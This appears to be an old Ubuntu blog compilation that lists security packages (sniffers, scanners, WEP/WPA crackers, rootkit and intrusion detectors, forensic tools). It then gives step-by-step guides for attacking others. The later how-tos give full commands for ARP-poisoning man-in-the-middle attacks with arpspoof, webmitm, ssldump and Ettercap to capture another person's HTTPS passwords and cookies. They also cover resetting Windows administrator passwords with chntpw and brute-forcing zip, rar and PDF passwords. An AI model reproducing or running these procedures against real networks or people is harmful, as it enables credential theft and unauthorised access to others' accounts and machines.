The Top Security Tools in the Ubuntu Repositories you may not know about with 1 click Installation!
Here is a collection of security tools that you should look through to add to your arsenal to help keep the peace on your pc/network or unleash war on others for whatever reason.
You can simply install these tools by clicking on the title within firefox in Ubuntu Hardy Heron.
Most of these are command line tools which need to be invoked via the Terminal:
Applications->Accessories->Terminal
If you need help with these tools, please read the manual via man "application" in the terminal, and feel free to comment if you need a little assistance or care to add to this growing list
Sniffers:
dsniff
Various tools to sniff network traffic for cleartext insecurities
This package contains several tools to listen to and create network traffic:
* arpspoof - Send out unrequested (and possibly forged) arp replies.
* dnsspoof - forge replies to arbitrary DNS address / pointer queries
on the Local Area Network.
* dsniff - password sniffer for several protocols.
* filesnarf - saves selected files sniffed from NFS traffic.
* macof - flood the local network with random MAC addresses.
* mailsnarf - sniffs mail on the LAN and stores it in mbox format.
* msgsnarf - record selected messages from different Instant Messengers.
* sshmitm - SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
* sshow - SSH traffic analyser.
* tcpkill - kills specified in-progress TCP connections.
* tcpnice - slow down specified TCP connections via "active"
traffic shaping.
* urlsnarf - output selected URLs sniffed from HTTP traffic in CLF.
* webmitm - HTTP / HTTPS monkey-in-the-middle. transparently proxies.
* webspy - sends URLs sniffed from a client to your local browser
(requires libx11-6 installed).
Please do not abuse this software.
-
imsniff
Simple program to log Instant Messaging activity on the network
The imsniff program can be used to log IM activity on the network. It uses
libpcap to capture packets and analyzes them, logging conversation, contact
lists, etc.
Users connecting after imsniff is started can get pretty good results,
including complete contact lists and events (displaying a name change, for
example). Users already connected will be able to get the conversations, but
will miss the other information.
The only required parameter is the interface name to listen to. This can be
any interface that libpcap supports. A sample imsniff.conf.sample file is
included.
imsniff is beta software, for now, only MSN is supported. Others could follow.
Author: Carlos Fernandez
-
ksniffer
network traffic analyzer for KDE
KSniffer is a network traffic analyzer, or "sniffer" for KDE.
A sniffer is a tool used to capture packets from your network.
it detects network protocols like IP, TCP, UDP, ICMP and ARP.
-
nwatch
Network service detector
NWatch is a sniffer but can be conceptualized as a "passive port
scanner", in that it is only interested in IP traffic and it organizes
results as a port scanner would.
The advantage of this tool is that services that are open for a short
period of time can be detected with NWatch while successive nmap scans
will miss them. The disadvantage is that the service have to be actively
used to be detected.
-
scapy
Scapy is a powerful interactive packet manipulation tool, packet
generator, network scanner, network discovery, packet sniffer, etc. It
can for the moment replace hping, 85% of nmap, arpspoof, arp-sk, arping,
tcpdump, tethereal, p0f, ....
In scapy you define a set of packets, then it sends them, receives
answers, matches requests with answers and returns a list of packet couples
(request, answer) and a list of unmatched packets. This has the big advantage
over tools like nmap or hping that an answer is not reduced to
(open/closed/filtered), but is the whole packet.
Homepage: http://www.secdev.org/projects/scapy/
It was previously named scapy. This is a transitional package
so scapy users get python-scapy on upgrades. This package handles
scapy -> python-scapy. It can be safely removed.
-
Snort
Flexible Network Intrusion Detection System
Snort is a libpcap-based packet sniffer/logger which can be used as a
lightweight network intrusion detection system. It features rules
based logging and can perform content searching/matching in addition
to being used to detect a variety of other attacks and probes, such
as buffer overflows, stealth port scans, CGI attacks, SMB probes, and
much more. Snort has a real-time alerting capability, with alerts being
sent to syslog, a separate "alert" file, or even to a Windows computer
via Samba.
This package provides the plain-vanilla snort distribution and does not
provide database (available in snort-pgsql and snort-mysql) support.
-
tcpick
TCP stream sniffer and connection tracker
This libpcap-based textmode sniffer can:
* track, reassemble and reorder TCP streams
* save the captured flows in different files or display them in the terminal
* display all the stream on the terminal with different display modes like
hexdump, hexdump + ascii, only printable characters, raw mode, colorized
mode ...
* handle several network interface types, including ethernet cards and PPP
interfaces
-
Tshark
Wireshark network traffic analyzer (console interface)
Wireshark is a network traffic analyzer, or "sniffer", for Unix and
Unix-like operating systems. A sniffer is a tool used to capture
packets off the wire. Wireshark decodes numerous protocols (too many
to list).
This package provides the console version of wireshark, named
"tshark".
-
WireShark
network traffic analyzer
Wireshark is a network traffic analyzer, or "sniffer", for Unix and
Unix-like operating systems. A sniffer is a tool used to capture
packets off the wire. Wireshark decodes numerous protocols (too many
to list).
This package provides wireshark (the GTK+ version)
-
Last But not least for the sniffers is my personal fav:
Ettercap
Multipurpose sniffer/interceptor/logger for switched LAN
Ettercap supports active and passive dissection of many protocols
(even ciphered ones) and includes many feature for network and host
analysis.
Data injection in an established connection and filtering (substitute
or drop a packet) on the fly is also possible, keeping the connection
synchronized.
Many sniffing modes were implemented to give you a powerful and complete
sniffing suite. It's possible to sniff in four modes: IP Based, MAC Based,
ARP Based (full-duplex) and PublicARP Based (half-duplex).
It has the ability to check whether you are in a switched LAN or
not, and to use OS fingerprints (active or passive) to let you know the
geometry of the LAN.
Wireless Tools:
aircrack-ng
Grab the latest @ www.aircrack-ng.com
wireless WEP/WPA cracking utilities
aircrack-ng is an 802.11a/b/g WEP/WPA cracking program that can recover a
40-bit, 104-bit, 256-bit or 512-bit WEP key once enough encrypted packets have
been gathered. Also it can attack WPA1/2 networks with some advanced
methods or simply by brute force.
It implements the standard FMS attack along with some optimizations,
thus making the attack much faster compared to other WEP cracking tools.
It can also fully use a multiprocessor system to its full power in order
to speed up the cracking process.
aircrack-ng is a fork of aircrack, as that project has been stopped by
the upstream maintainer.
-
Kismet
Wireless 802.11b monitoring tool
Kismet is a 802.11b wireless network sniffer. It is capable of sniffing
using almost any supported wireless card using the Airo, HostAP, Wlan-NG,
and Orinoco (with a kernel patch) drivers.
Can make use of sox and festival to play audio alarms for network events
and speak out network summary on discovery. Optionally works with gpsd
to map scanning.
-
Prismstumbler
Wireless network sniffer
Prismstumbler is a packet sniffer for 802.11b wireless LANs.
-
SWScanner
Simple Wireless Scanner
SWScanner is a KDE application specially designed to make easy the whole
wardriving process, but also intended to facilitate many tasks related
to wireless networks. SWScanner is compatible with NetStumbler files and
supports GPS devices.
-
WEPLab
tool designed to break WEP keys
WepLab is a tool designed to teach how WEP works, what different
vulnerabilities it has, and how they can be used in practice to
break a WEP protected wireless network.
WepLab can dump network traffic, analyse it or crack the WEP key.
-
Portscanning:
NMAP
The Network Mapper
Nmap is a utility for network exploration or security auditing. It
supports ping scanning (determine which hosts are up), many port
scanning techniques, version detection (determine service protocols
and application versions listening behind ports), and TCP/IP
fingerprinting (remote host OS or device identification). Nmap also
offers flexible target and port specification, decoy/stealth scanning,
sunRPC scanning, and more. Most Unix and Windows platforms are
supported in both GUI and commandline modes. Several popular handheld
devices are also supported, including the Sharp Zaurus and the iPAQ.
-
PnScan
Multi threaded port scanner
Pnscan is a multi threaded port scanner that can scan a large network
very quickly. If does not have all the features that nmap have but
is much faster.
-
DoScan
port scanner for discovering services on large networks
doscan is a tool to discover TCP services on your network. It is
designed for scanning a single ports on a large network. doscan
contacts many hosts in parallel, using standard TCP sockets provided
by the operating system. It is possible to send strings to remote
hosts, and collect the banners they return.
There are better tools for scanning many ports on a small set of
hosts, for example nmap.
-
HPING3
Active Network Smashing Tool
hping3 is a network tool able to send custom ICMP/UDP/TCP packets and
to display target replies like ping does with ICMP replies. It handles
fragmentation and arbitrary packet body and size, and can be used to
transfer files under supported protocols. Using hping3, you can test
firewall rules, perform (spoofed) port scanning, test network
performance using different protocols, do path MTU discovery, perform
traceroute-like actions under different protocols, fingerprint remote
operating systems, audit TCP/IP stacks, etc. hping3 is scriptable
using the TCL language.
-
Paketto
Unusual TCP/IP testing tools
The Paketto Keiretsu is a collection of tools that use new and unusual
strategies for manipulating TCP/IP networks. scanrand is said to be
faster than nmap and more useful in some scenarios.
This package includes:
* scanrand, a very fast port, host, and network trace scanner
* minewt, a user space NAT/MAT (MAC Address Translation) gateway
* linkcat(lc), that provides direct access to the network (Level 2)
* paratrace, a "traceroute"-like tool using existing TCP connections
* phentropy, that plots a large data source onto a 3D matrix
-
Packit
Network Injection and Capture
Packit is a network auditing tool. Its value is derived from its ability
to customize, inject, monitor, and manipulate IP traffic. By allowing you
to define (spoof) nearly all TCP, UDP, ICMP, IP, ARP, RARP, and Ethernet
header options, Packit can be useful in testing firewalls, intrusion
detection systems, port scanning, simulating network traffic, and general
TCP/IP auditing. Packit is also an excellent tool for learning TCP/IP.
-
ScanSSH
get SSH server versions for an entire network
The ScanSSH protocol scanner scans a list of addresses and networks for
running SSH protocol servers and their version numbers. Version 2.0 adds
support for scanning arbitrary ports and specifically open proxies. The
ScanSSH protocol scanner supports random selection of IP addresses from
large network ranges and is useful for gathering statistics on the
deployment of SSH protocol servers in a company or the Internet as whole.
-
p0f
Passive OS fingerprinting tool
p0f performs passive OS detection based on SYN packets. Unlike nmap
and queso, p0f does recognition without sending any data.
Additionally, it is able to determine the distance to the remote
host, and can be used to determine the structure of a foreign or
local network. When running on the gateway of a network it is able
to gather huge amounts of data and provide useful statistics. On a
user-end computer it could be used as powerful IDS add-on. p0f
supports full tcpdump-style filtering expressions, and has an
extensible and detailed fingerprinting database.
-
Misc Tools:
TCPTraceroute
A traceroute implementation using TCP packets
The more traditional traceroute(8) sends out either UDP or ICMP ECHO
packets with a TTL of one, and increments the TTL until the destination
has been reached. By printing the gateways that generate ICMP time
exceeded messages along the way, it is able to determine the path packets
are taking to reach the destination.
The problem is that with the widespread use of firewalls on the modern
Internet, many of the packets that traceroute(8) sends out end up being
filtered, making it impossible to completely trace the path to the
destination. However, in many cases, these firewalls will permit inbound
TCP packets to specific ports that hosts sitting behind the firewall are
listening for connections on. By sending out TCP SYN packets instead of
UDP or ICMP ECHO packets, tcptraceroute is able to bypass the most common
firewall filters.
Traceroute
Traces the route taken by packets over an IPv4/IPv6 network
The traceroute utility displays the route used by IP packets on their way to a
specified network (or Internet) host. Traceroute displays the IP number and
host name (if possible) of the machines along the route taken by the packets.
Traceroute is used as a network debugging tool. If you're having network
connectivity problems, traceroute will show you where the trouble is coming
from along the route.
Install traceroute if you need a tool for diagnosing network connectivity
problems.
Homepage:
Whois
the GNU whois client
This is a new whois (RFC 3912) client rewritten from scratch.
It is inspired from and compatible with the usual BSD and RIPE whois(1)
programs.
It is intelligent and can automatically select the appropriate whois
server for most queries.
The package also contains mkpasswd, a simple front end to crypt(3).
-
Rootkit Detection:
Chkrootkit
Checks for signs of rootkits on the local system
chkrootkit identifies whether the target computer is infected with a rootkit.
Some of the rootkits that chkrootkit identifies are:
1. lrk3, lrk4, lrk5, lrk6 (and some variants);
2. Solaris rootkit;
3. FreeBSD rootkit;
4. t0rn (including latest variant);
5. Ambient's Rootkit for Linux (ARK);
6. Ramen Worm;
7. rh[67]-shaper;
8. RSHA;
9. Romanian rootkit;
10. RK17;
11. Lion Worm;
12. Adore Worm.
Please note that this is not a definitive test, it does not ensure that the
target has not been cracked. In addition to running chkrootkit, one should
perform more specific tests.
-
RkHunter
rootkit, backdoor, sniffer and exploit scanner
Rootkit Hunter scans systems for known and unknown rootkits,
backdoors, sniffers and exploits.
It checks for:
- MD5 hash changes;
- files commonly created by rootkits;
- executables with anomalous file permissions;
- suspicious strings in kernel modules;
- hidden files in system directories;
and can optionally scan within files.
Using rkhunter alone does not guarantee that a system is not
compromised. Running additional tests, such as chkrootkit, is
recommended.
-
UnHide
Forensic tool to find hidden processes and ports
Unhide is a forensic tool to find processes and TCP/UDP ports hidden by
rootkits, Linux kernel modules or by other techniques. It includes two
utilities: unhide and unhide-tcp.
unhide detects hidden processes using three techniques:
- comparing the output of /proc and /bin/ps
- comparing the information gathered from /bin/ps with the one gathered
from system calls (syscall scanning)
- full scan of the process ID space (PIDs bruteforcing)
unhide-tcp identifies TCP/UDP ports that are listening but are not listed in
/bin/netstat through brute forcing of all TCP/UDP ports available.
This package can be used by rkhunter in its daily scans.
-
Secure Erase:
wipe
Secure file deletion
Recovery of supposedly erased data from magnetic media is easier than what many
people would like to believe. A technique called Magnetic Force Microscopy
(MFM) allows any moderately funded opponent to recover the last two or three
layers of data written to disk. Wipe repeatedly writes special patterns to the
files to be destroyed, using the fsync() call and/or the O_SYNC bit to force
disk access.
-
Undelete/Recovery:
Foremost
Forensics application to recover data
This is a console program to recover files based on their headers and
footers for forensics purposes.
Foremost can work on disk image files, such as those generated by dd,
Safeback, Encase, etc, or directly on a drive. The headers and footers
are specified by a configuration file, so you can pick and choose which
headers you want to look for.
-
e2undel
Undelete utility for the ext2 file system
Interactive console tool to recover the data of deleted files on
an ext2 file system under Linux. It does not require knowledge
about how ext2 file systems works and should be usable by
most people.
This tools searches all inodes marked as deleted on a file system and
lists them as sorted by owner and time of deletion. Additionally,
it gives you the file size and tries to determine the file type in
the way file(1) does. If you did not just delete a whole bunch of
files with a 'rm -r *', this information should be helpful to find
out which of the deleted files you would like to recover.
E2undel will not work on ext3 (journaling) filesystems.
Homepage: http://e2undel.sourceforge.net
-
Recover
Undelete files on ext2 partitions
Recover automates some steps as described in the ext2-undeletion
howto. This means it seeks all the deleted inodes on your hard drive
with debugfs. When all the inodes are indexed, recover asks you some
questions about the deleted file. These questions are:
* Hard disk device name
* Year of deletion
* Month of deletion
* Weekday of deletion
* First/Last possible day of month
* Min/Max possible file size
* Min/Max possible deletion hour
* Min/Max possible deletion minute
* User ID of the deleted file
* A text string the file included (can be ignored)
If recover found any fitting inodes, it asks to give a directory name
and dumps the inodes into the directory. Finally it asks you if you
want to filter the inodes again (in case you typed some wrong
answers).
Note that recover works only with ext2 filesystems - it does not support
ext3.
http://recover.sourceforge.net/linux/recover/
-
Port Scan Detection:
PSAD
The Port Scan Attack Detector
PSAD is a collection of four lightweight system daemons written in
Perl and in C that is designed to work with Linux firewalling code
(iptables in the 2.4.x kernels, and ipchains in the 2.2.x kernels)
to detect port scans. It features a set of highly configurable danger
thresholds (with sensible defaults provided), verbose alert messages
that include the source, destination, scanned port range, begin and
end times, tcp flags and corresponding nmap options (Linux 2.4.x
kernels only), reverse DNS info, email alerting, and automatic
blocking of offending ip addresses via dynamic configuration of
ipchains/iptables firewall rulesets.
In addition, for the 2.4.x kernels psad incorporates many
of the tcp signatures included in Snort to detect highly suspect scans
for:
* various backdoor programs (e.g. EvilFTP, GirlFriend, SubSeven)
* DDoS tools (mstream, shaft)
* advanced port scans (syn, fin, xmas) such as those made with nmap
Homepage: http://www.cipherdyne.org/
-
PortSentry
Portscan detection daemon
PortSentry has the ability to detect portscans(including stealth scans) on
the network interfaces of your machine. Upon alarm it can block the
attacker via hosts.deny, dropped route or firewall rule. It is part of the
Abacus program suite.
Note: If you have no idea what a port/stealth scan is, It's recommended to
have a look at http://sf.net/projects/sentrytools/ before installing this
package. Otherwise you might easily block hosts you'd better not (e.g. your
NFS-server, name-server, etc.).
-
Snort
Flexible Network Intrusion Detection System
Snort is a libpcap-based packet sniffer/logger which can be used as a
lightweight network intrusion detection system. It features rules
based logging and can perform content searching/matching in addition
to being used to detect a variety of other attacks and probes, such
as buffer overflows, stealth port scans, CGI attacks, SMB probes, and
much more. Snort has a real-time alerting capability, with alerts being
sent to syslog, a separate "alert" file, or even to a Windows computer
via Samba.
This package provides the plain-vanilla snort distribution and does not
provide database (available in snort-pgsql and snort-mysql) support.
-
Privilege escalation detection:
Ninja
Ninja is a privilege escalation detection and prevention
system for GNU/Linux hosts. While running, it will monitor
process activity on the local host, and keep track of all
processes running as root. If a process is spawned with
UID or GID zero (root), ninja will log necessary information
about this process, and optionally kill the process
if it was spawned by an unauthorized user.
A "magic" group can be specified, allowing members of this
group to run any setuid/setgid root executable.
Individual executables can be whitelisted. Ninja uses a
fine grained whitelist that lets you whitelist executables
on a group and/or user basis. This can be used to allow
specific groups or individual users access to setuid/setgid
root programs, such as su(1) and passwd(1).
Homepage: http://forkbomb.org/ninja
Filesystem Integrity:
Aide
Advanced Intrusion Detection Environment - static binary
AIDE is an intrusion detection system that detects changes to files on
the local system. It creates a database from the regular expression rules
that it finds from the config file. Once this database is initialized
it can be used to verify the integrity of the files. It has several
message digest algorithms (md5, sha1, rmd160, tiger, haval, etc.) that are
used to check the integrity of the file. More algorithms can be added
with relative ease. All of the usual file attributes can also be checked
for inconsistencies.
This package contains the statically linked binary for "normal"
systems.
You will almost certainly want to tweak the configuration file in
/etc/aide/aide.conf or drop your own config snippets into
/etc/aide/aide.conf.d.
Upstream URL: http://sourceforge.net/projects/aide
-
Integrit
A file integrity verification program
Integrit helps you determine whether an intruder has modified your
system. Without the use of integrit, a sysadmin wouldn't know if the
programs used for investigating the system are trojan horses or not.
Integrit works by creating a database that is a snapshot of the most
essential parts of the system. You put the database somewhere safe,
and then later you can use it to make sure that no one has made any
illicit modifications to your file system.
Integrit's key features are the small memory footprint, the design
with unattended use in mind, intuitive cascading rulesets for the
paths listed in the configuration file, the possibility of XML or
human-readable output, and simultaneous checks and updates.
See http://integrit.sourceforge.net/ for more information.
-
Debsums
Verify installed package files against MD5 checksums.
debsums can verify the integrity of installed package files against
MD5 checksums installed by the package, or generated from a .deb
archive.
-
Fcheck
IDS filesystem baseline integrity checker
The fcheck utility is an IDS (Intrusion Detection System)
which can be used to monitor changes to any given filesystem.
Essentially, fcheck has the ability to monitor directories, files
or complete filesystems for any additions, deletions, and modifications.
It is configurable to exclude active log files, and can be ran as often
as needed from the command line or cron making it extremely difficult to
circumvent.
-
SamHain
Data integrity and host intrusion alert system
Samhain is an integrity checker and host intrusion detection system that
can be used on single hosts as well as large, UNIX-based networks.
It supports central monitoring as well as powerful (and new) stealth
features to run undetected on memory using steganography.
Main features
* Complete integrity check
+ uses cryptographic checksums of files to detect
modifications,
+ can find rogue SUID executables anywhere on disk, and
* Centralized monitoring
+ native support for logging to a central server via encrypted
and authenticated connections
* Tamper resistance
+ database and configuration files can be signed
+ logfile entries and e-mail reports are signed
+ support for stealth operation
Homepage: http://la-samhna.de/samhain/index.html
-
SleuthKit
Tools for forensics analysis
The Sleuth Kit (previously known as TASK) is a collection of UNIX-based
command line file system and media management forensic analysis tools.
The file system tools allow you to examine file systems of a suspect
computer in a non-intrusive fashion. Because the tools do not rely on
the operating system to process the file systems, deleted and hidden
content is shown.
The media management tools allow you to examine the layout of disks and
other media. The Sleuth Kit supports DOS partitions, BSD partitions
(disk labels), Mac partitions, and Sun slices (Volume Table of
Contents). With these tools, you can identify where partitions are
located and extract them so that they can be analyzed with file system
analysis tools.
When performing a complete analysis of a system, we all know that
command line tools can become tedious. The Autopsy Forensic Browser is
a graphical interface to the tools in The Sleuth Kit, which allows you
to more easily conduct an investigation. Autopsy provides case
management, image integrity, keyword searching, and other automated
operations.
The Sleuth Kit's upstream homepage can be found at
http://www.sleuthkit.org/sleuthkit/.
-
Stealth
A stealthy File Integrity Checker
The STEALTH program performs File Integrity Checks on (remote) clients. It
differs from other File Integrity Checkers by not requiring baseline
integrity data to be kept on either write-only media or in the client's file
system. In fact, client's will contain hardly any indication at all that they
are being monitored, thus improving the stealthiness of the integrity scans.
STEALTH uses standard available software to perform file integrity checks
(like find(1) and md5sum(1)). Using individualized policy files, it is highly
adaptable to the specific requirements of its clients.
In production environments STEALTH should be run from an isolated computer
(called the `STEALTH monitor'). In optimal configurations the STEALTH
monitor should be a computer not accepting incoming connections. The account
used to connect to its clients does not have to be `root': usually
read-access to the client's file system is enough to perform a full integrity
check. Instead of using `root' a more restrictive administrative or
ordinary account might offer all requirements for the desired integrity
check.
STEALTH itself must communicate with the computers it should monitor. It is
essential that this communication is secure, and STEALTH configurations will
therefore normally specify SSH as the command-shell to use to connect to its
clients. STEALTH may be configured so as to use but one SSH connection per
client, even if integrity scans are to be performed repeatedly. Apart from
this, the STEALTH monitor might be allowed to send e-mail to remote clients
system's maintainers.
STEALTH-runs itself may start randomly within specified intervals. The
resulting unpredicability of STEALTH-runs further increases STEALTH's
stealthiness.
STEALTH's acronym is expanded to `Ssh-based Trust Enforcement Acquired
through a Locally Trusted Host': the client's trust is enforced, the locally
trusted host is the STEALTH monitor.
-
TripWire
file and directory integrity checker
Tripwire is a tool that aids system administrators and users in
monitoring a designated set of files for any changes. Used with
system files on a regular (e.g., daily) basis, Tripwire can notify
system administrators of corrupted or tampered files, so damage
control measures can be taken in a timely manner.
Have anything else worth mentioning? Please leave a comment
Howto: Use arpspoof, webmitm, and ssldump to effectively sniff passwords and other info via https connections on the lan/wlan with Ubuntu Linux!
Let me show you how easy it is to sniff someone elses password/cookies via ssl/https on the lan/wlan with ubuntu linux.
We will be using Arp Spoofing/Poisoning for this attack, if you have problems with this howto, there is an alternate with ettercap here that may be a bit easier
You can learn more about arp spoofing and poisoning here
The Attack preparation:
First lets grab the necessary packages:sudo apt-get install dsniff ssldump
Now lets enable packet forwarding:sudo -secho 1 > /proc/sys/net/ipv4/ip_forward
Lets set some iptables rules:iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECTiptables -A FORWARD -j ACCEPTarpspoof -t "target ip(person to own)" "gateway ip(router)"webmitm -dssldump -n -d -k webmitm.crt | tee ssldump.log
Now all you do is wait for the target machine to log into google/gmail/yahoo/msn/hotmail or any other https connection, even a bank or whatever interests you and you will see the passwords pop up in the terminal.
Defense against this attack:
Please see my page on hardening the Ubuntu Linux kernel with sysctl here
It seems like this isnt working for everyone, I will be redoing this howto today, stay tuned.
Howto: Install Metasploit 3.1 svn in Ubuntu Hardy Heron
The Metasploit Framework is a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
The framework consists of tools, libraries, modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload.
This is a tool that I pentest my lan with and can be used to hack remote computers/networks or whatever, I will show you how to get this setup and installed in Ubuntu Hardy very easily:
First lets install the Dependencies:sudo apt-get install build-essential ruby libruby rdoc libyaml-ruby libzlib-ruby libopenssl-ruby libdl-ruby libreadline-ruby libiconv-ruby rubygems sqlite3 libsqlite3-ruby libsqlite3-dev irb subversion
Lets grab rubygems and install it because the ubuntu package is crap.wget http://rubyforge.org/frs/download.php/11289/rubygems-0.9.0.tgz
tar -xvzf rubygems-0.9.0.tgz
cd rubygems-0.9.0
sudo ruby setup.rb
sudo gem install -v=1.1.6 rails
Now at last we can grab metasploit:svn co http://metasploit.com/svn/framework3/trunk/ metasploit
Lets load cd to the metasploit dir, and update it, I do this before executing every time.cd metasploit
Update Metasploit exploits/modules/payloads/packagesvn up
Lets Startup Metasploit./msfconsole
Learn more about metasploit here
Howto: Change Windows Administrator password in Ubuntu Hardy Heron Easily
I absolutely hate microsoft products thats why I love breaking it. This hack, is way too easy. Whatever your reason for changing any users password, this simple howto will surely satisfy that need. The only way to prevent this currently is with full disk encryption. Here is how you change windows password within Ubuntu Hardy Heron.
You can either use your livecd or hddsudo apt-get install chntpw
Now its installed, so lets get to work...
Ok I am assuming your using a hardy heron livecd or a Ubuntu Hardy Heron full install
You will now need to mount the windows partition read/write permission then navigate to %systemroot%/system32/config
Once your located in the config directory issue this command to change the passwordchntpw -u administrator SAM
- Prompt for password for 'administrator', if found (otherwise do nothing) use * to blank
Now reboot and login to winblows
Optionally you can skip resetting the password and just install Ubuntu
Crack your Zip Files in Ubuntu with the Ultimate Zip Cracker
Why, the hell, another zip cracker? fcrackzip isnt just any other file cracker, it is quiet old (born in 1998) and I believe the last version was from 2004. However it is simple mentioned for being the first open-sourced zip-cracker out there.
fcrackzip searches each zipfile given for encrypted files and tries to guess the password. All files must be encrypted with the same password, the more files you provide, the better.
FCrackZip is The Ultimate password cracker for zip archives
fcrackzip is a fast password cracker partly written in assembler.
It is able to crack password protected zip files with brute
force or dictionary based attacks, optionally testing with
unzip its results.
It can also crack cpmask'ed images.
Homepage: http://www.goof.com/pcg/marc/fcrackzip.html
How to Install:sudo apt-get install fcrackzip
Install with 1-click if you have apt-url installed and your using firefox!
Examples:fcrackzip -c a -p aaaaaa sample.zip checks the encrypted files in sample.zip for all lowercase 6 character passwords (aaaaaa ... abaaba ... ghfgrg ... zzzzzz).
fcrackzip --method cpmask --charset A --init AAAA test.ppm checks the obscured image test.ppm for all four character passwords. -TP fcrackzip -D -p passwords.txt sample.zip check for every password listed in the file passwords.txt.
More info from the authors site here
Need to crack rar, 7z files? Check here for another tool ive unleashed
Crack Pdf Files with Ubuntu Linux!
Dont you hate when you run into a locked down pdf on the web? I search google all the time for title filetype:pdf and some are locked, this is the solution! PDFCrack is a GNU/Linux (other POSIX-compatible systems should work too) tool for recovering passwords and content from PDF-files. It is small, command line driven without external dependencies. The application is Open Source (GPL).
Features
* Supports the standard security handler (revision 2 and 3) on all known PDF-versions
* Supports cracking both owner and userpasswords
* Both wordlists and bruteforcing the password is supported
* Simple permutations (currently only trying first character as Upper Case)
* Save/Load a running job
* Simple benchmarking
* Optimised search for owner-password when user-password is known
Install pdfcrack in Ubuntusudo aptitude install pdfcrack
pdfcrack Syntaxpdfcrack -f filename [options]
pdfcrack Options
-b, - -bench - Perform benchmark and exit.
-c, - -charset=STRING - Use the characters in STRING as charset.
-m, - -maxpw=INTEGER - Stop when reaching INTEGER as password length.
-n, - -minpw=INTEGER - Skip trying passwords shorter than INTEGER.
-l, - -loadState=FILE - Continue from the state saved in FILENAME.
-o, - -owner - Work with the ownerpassword.
-p, –password=STRING - Uses STRING as userpassword to speed up breaking ownerpassword (implies -o).
-q, - -quiet - Run quietly.
-s, - -permutate - Try permutating the passwords (currently only supports switching
first character to uppercase).
-u, - -user - Work with the userpassword (default).
-v, - -version - Print version and exit.
-w, - -wordlist=FILE - Use FILE as source of passwords to try.
pdfcrack Examplepdfcrack mylocked.pdf
More information on this great utility can be found @ the authors site here
Lifehacker.com Has some alternative utilities and ideas for cracking pdf's here
UbuntuGeek has some information about this tool here
Howto: Crack Rar, 7z, and zip files with RarCrack in Ubuntu Linux
This program uses bruteforce algorithm to find correct password. You can specify which characters will be used in password generations.
Download RarCrack
wget http://superb-east.dl.sourceforge.net/sourceforge/rarcrack/rarcrack-0.2.tar.bz2 Install RarCrack
tar xvjf rarcrack-0.2.tar.bz2cd rarcrack-0.2sudo apt-get install libxml2-devmake ; sudo make installUsing RarCrack:
rarcrack your_encrypted_archive.ext [--threads thread_num] [--type rar|zip|7z]After the cracking started RarCrack will print the current status of cracking and save it's to a status file. If you want more specific password character set, you need to run RarCrack to create the XML status file (3 sec).
There will be a sample XML file, and you see there is a character set. If you want, you can modify this file and when you start RarCrack again the program will be use new variables.
Warning: Take care when you changing this file, make sure the current password don't have characters outside the abc[character set]!
Know of any other rar/zip/7z cracking tools worth mentioning?
More information on rarcrack can be found here
Howto: Sniff or Hack someone’s username and password over an SSL encrypted connection with Ubuntu Linux
Do you think you're safe if you type https :// before gmail.com or paypal.com? I hope you'll think twice before you login from a computer connected to a wireless network after reading this guide. Let's start at the beginning. Let's say you have an evil neighbour who wants your paypal credentials. He buys himself a nice laptop with a wireless card and, if you are using a wep encryption, he cracks your wep code (click here to see how). After cracking the key he logs into your network. Maybe you always allowed him to use your network because you thought it can't do any harm to your computer. You aren't sharing any folders so what's the problem? Well, in the next few steps I'm going to describe the problem.
Guide
1. Let's assume your neighbour uses linux to crack your wep key. After cracking it, he installs ettercap (http://ettercap.sourceforge.net/) on his linux system. If you want to do this at home, I would recommend you to download BackTrack because it already has everything installed. If you want to install it on your own linux distribution, download the source and install it with the following commands:
$ tar -xzvf ettercap-version.tar.gz
$ make
$ make install
To install in Ubuntu simply click here within firefox or:
sudo apt-get install ettercap-gtk
2. After installing, you need to uncomment some code to enable SSL dissection. Open up a terminal window and type “nano /usr/local/etc/etter.conf”, without the quotes. Scroll down using your arrow keys until you find this piece of code:
if you use iptables:# redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp -dport %port -j REDIRECT -to-port %rport”
# redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp -dport %port -j REDIRECT -to-port %rport”
You need to uncomment the last two lines.redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp -dport %port -j REDIRECT -to-port %rport”
redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp -dport %port -j REDIRECT -to-port %rport”
3. Press CTRL+O, press enter to safe the file and then press CTRL+X.
4. Start Ettercap and click on Sniff > Unified Sniffing > type in your wireless interface and press ok.
5. Press CTRL+S to scan for hosts
6. Go to MITM > ARP poisoning, select sniff remote connections and press ok.
7. Now you (and your neighbour!) can start sniffing! Press start > start sniffing. Walk to another computer on your network and open up paypal or any other site where you need to type in an username/password (gmail, hotmail, digg.com, etc.). All credentials will appear on the computer running Ettercap!
8. When you're done, don't just close Ettercap, but go to Start > Stop Sniffing, and then go to MITM > Stop mitm attack(s).
But how does all this stuff work?
Look at the following scheme:
Normally when you type in a password, host 1 (your computer) directly connects to host 2 (your modem or router). But if someone launced Ettercap on your network, host 1 isn't sending it's passwords to host 2, but to the Attacking host, the host that's running Ettercap! The attacking host sends everything to Host 2. This means that host 1 isn't noticing anything! Exactly the same happens with everything that host 2 is sending. Host 2 doesn't send packets directly to host 1, but forst to the attacking host.
Howto: Access Web Based email through Thunderbird
Here is a solution for the web-based email services that do not have pop3/smtp, and the ones that charge for it, this extention acts like a browser and converts the mail to pop3/smtp/imap for thunderbird.
Below is a list of supported web-based email services that this extension supports, following that is an easy install guide to get started, I used yahoo as an example.
Here is the supported web based services:
Ok now lets get to the good stuff and set this up! 
Hotmail
Hotmail.com Hotmail.fr Hotmail.it Hotmail.de Hotmail.co.uk MSN.com MSN.co.uk 
Yahoo
Yahoo.com Yahoo.com.cn Yahoo.com.hk Yahoo.com.au Yahoo.com.sg Yahoo.com.ar Yahoo.co.uk Yahoo.co.jp Yahoo.it Yahoo.ie Yahoo.es Yahoo.se Yahoo.fr Yahoo.de Yahoo.ca Talk21.com BTinternet.com BTopenworld.com 
Lycos
Lycos.co.uk Lycos.it Lycos.es Lycos.de Lycos.at Lycos.nl Caramail.com 
